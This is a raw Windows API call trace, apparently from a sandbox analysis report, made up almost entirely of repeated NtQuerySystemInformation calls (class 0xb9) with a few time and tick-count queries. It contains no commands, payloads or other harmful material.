NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x50, ResultLength=0x0) [0282.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x28, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x28, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0282.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x28, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0282.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf00, Length=0x38, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0282.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d030 | out: lpSystemTimeAsFileTime=0xa78207d030*(dwLowDateTime=0x3603e703, dwHighDateTime=0x1d6666a)) [0282.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e8, Length=0x50, ResultLength=0x0) [0282.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0282.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0282.999] GetTickCount () returned 0x1186cf0 [0283.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x28, ResultLength=0x0) [0283.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0283.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x28, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x38, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x20, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce08, Length=0x58, ResultLength=0x0) [0283.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation 